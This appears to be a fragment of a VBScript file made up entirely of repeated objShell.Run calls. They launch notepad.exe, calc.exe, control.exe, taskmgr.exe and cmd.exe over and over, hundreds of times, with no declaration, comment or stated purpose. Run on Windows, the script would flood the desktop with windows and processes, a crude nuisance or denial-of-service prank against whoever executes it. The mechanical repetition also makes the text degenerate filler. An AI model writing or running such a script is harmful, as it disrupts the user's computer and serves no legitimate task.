objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
